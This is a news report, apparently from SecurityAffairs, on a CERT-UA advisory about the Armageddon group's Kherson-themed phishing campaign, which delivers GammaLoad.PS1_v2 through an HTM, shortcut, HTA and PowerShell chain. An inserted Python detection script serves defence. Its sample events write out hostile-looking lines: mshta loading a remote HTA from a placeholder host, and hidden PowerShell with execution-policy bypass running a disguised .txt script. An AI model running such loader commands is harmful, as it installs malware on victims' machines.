Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware.

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject “On revenge in Kherson!” and containing the “Plan Kherson.htm” attachment.

The HTM file decodes and drops an archive named “Herson.rar”, which contains a shortcut file named “Plan of approach and planting explosives on the objects of critical infrastructure of Kherson.lnk”.


Upon clicking on the shortcut file, the HTA file “precarious.xml” is loaded and executed, leading to the creation and execution of the files “desktop.txt” and “user.txt”.

In the last stage of the attack chain, the GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer.
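The chain described above (shortcut → mshta loading an HTA served with a .xml name → PowerShell loader run from files with a .txt name) is the kind of process lineage a detection engineer can flag from endpoint telemetry. The following is an added example, not code from CERT-UA or the article; the log lines are constructed, the host name is a placeholder, and the assumption that desktop.txt is handed to PowerShell with -f is illustrative, not a stated detail of the advisory.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a simplified "parent_image|image|command_line" form,
# modelled on Sysmon Event ID 1 fields. Not real telemetry from the campaign.
SAMPLE_EVENTS = [
    "explorer.exe|mshta.exe|mshta.exe http://placeholder.invalid/precarious.xml",
    "mshta.exe|powershell.exe|powershell.exe -w hidden -ep bypass -f C:\\Users\\u\\desktop.txt",
    "explorer.exe|mshta.exe|mshta.exe C:\\tools\\legit.hta",
    "explorer.exe|chrome.exe|chrome.exe --profile-directory=Default",
]


@dataclass
class Finding:
    rule: str
    event: str


def parse_event(line):
    """Split a pipe-delimited event into (parent, image, command_line)."""
    parent, image, cmd = line.split("|", 2)
    return parent.lower(), image.lower(), cmd


def detect(events):
    """Return findings for the three suspicious steps of the described chain."""
    findings = []
    for line in events:
        parent, image, cmd = parse_event(line)
        args = cmd.split(None, 1)[1] if " " in cmd else ""
        if image == "mshta.exe":
            # HTA content fetched from a URL or served under a non-.hta extension
            if re.match(r"https?://", args, re.I) or (args and not args.lower().endswith(".hta")):
                findings.append(Finding("mshta_non_hta_payload", line))
        if image == "powershell.exe" and parent == "mshta.exe":
            # PowerShell spawned by mshta.exe is rare in legitimate use
            findings.append(Finding("powershell_from_mshta", line))
        if image == "powershell.exe" and re.search(r"(-f|-file)\s+\S+\.txt\b", cmd, re.I):
            # Script content disguised with a .txt extension
            findings.append(Finding("powershell_script_with_txt_ext", line))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.rule, "=>", f.event)
```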

The government experts attribute the attack to the Russia-linked Armageddon APT (UAC-0010, aka Gamaredon, Primitive Bear, Winterflounder, or Iron Tilden), which has been involved in a long string of attacks against Ukrainian state organizations.

“As a result, the malicious program GammaLoad.PS1_v2 will be downloaded to the computer (the mechanism of taking a screenshot and sending it to the management server has been implemented),” reads the advisory published by CERT-UA. “The activity is carried out by the group UAC-0010 (Armageddon).”

The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.


Pierluigi Paganini

(SecurityAffairs – hacking, CERT-UA)
